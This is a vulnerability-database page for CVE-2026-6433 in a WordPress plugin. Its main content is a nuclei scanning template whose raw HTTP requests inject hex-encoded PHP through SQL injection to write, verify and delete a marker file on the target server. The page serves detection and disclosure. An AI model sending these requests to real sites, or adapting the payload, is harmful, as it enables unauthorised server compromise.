Lucene search
K

FlipperCode Custom CSS, JS & PHP <= 2.0.7 - Remote Code Execution

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 19 Views

FlipperCode WordPress plugin up to 2.0.7 allows unauthenticated remote code execution via unsanitized input.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
wp-exploit
30 Jun 202609:55
githubexploit
GithubExploit
Exploit for CVE-2026-6433
16 May 202609:29
githubexploit
ATTACKERKB
CVE-2026-6433
11 May 202606:00
attackerkb
Circl
CVE-2026-6433
11 May 202606:35
circl
CNNVD
WordPress plugin Custom css-js-php 安全漏洞
11 May 202600:00
cnnvd
CVE
CVE-2026-6433
11 May 202606:00
cve
Cvelist
CVE-2026-6433 Custom CSS JS PHP <= 2.0.7 - Unauthenticated SQL Injection to RCE
11 May 202606:00
cvelist
EUVD
EUVD-2026-29034
11 May 202606:31
euvd
NVD
CVE-2026-6433
11 May 202606:16
nvd
Patchstack
WordPress Custom CSS JS PHP plugin <= 2.0.7 - Unauthenticated SQL Injection to RCE vulnerability
12 May 202609:51
patchstack
Rows per page
id: CVE-2026-6433

info:
  name: FlipperCode Custom CSS, JS & PHP <= 2.0.7 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    Custom css-js-php WordPress plugin through 2.0.7 contains a command injection caused by unsanitized user input used in SQL query and passed to eval(), letting unauthenticated attackers execute arbitrary PHP code on the server.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code on the server, leading to full server compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://wpscan.com/vulnerability/a0b1c059-e156-4402-ac8d-67f8ad7386cc/
    - https://github.com/murrez/CVE-2026-6433
    - https://patchstack.com/database/wordpress/plugin/custom-css-js-php/vulnerability/wordpress-custom-css-js-php-plugin-2-0-7-unauthenticated-sql-injection-to-rce-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2026-6433
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-6433
    epss-score: 0.00753
    epss-percentile: 0.50537
  metadata:
    verified: true
    max-request: 3
    vendor: flippercode
    product: custom-css-js-php
    framework: wordpress
    shodan-query: http.component:"WordPress"
  tags: cve,cve2026,wordpress,wp-plugin,sqli,rce,custom-css-js-php,unauth,intrusive,vkev

variables:
  filename: "{{rand_text_alpha(8)}}"
  marker: "{{rand_text_alpha(12)}}"

flow: |
  http(1) && http(2) && http(3);

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702066696c655f7075745f636f6e74656e74732827{{hex_encode(filename)}}2e747874272c27{{hex_encode(marker)}}27293b203f3e,'header','',0,1--+

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 || status_code == 500"
        internal: true

  - raw:
      - |
        GET /wp-admin/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{marker}}"

      - type: status
        status:
          - 200

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=fc_ajax_call&operation=wce_editor_inline_code&id=0+UNION+SELECT+1,'t','php',0x3c3f7068702040756e6c696e6b2827{{hex_encode(filename)}}2e74787427293b203f3e,'header','',0,1--+

    matchers:
      - type: dsl
        dsl:
          - "true"
        internal: true
# digest: 490a0046304402207afeff0fa3575ad7d4394ae3cbc16f67d58f0aa4df282b565b25b04cba7b6f1a022076996acea826bd8126551a1220cfd7e6f5abb0f7cffd96d51000174c60f496b3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 May 2026 09:52Current
6.3Medium risk
Vulners AI Score6.3
CVSS 3.17.3
EPSS0.00753
SSVC
19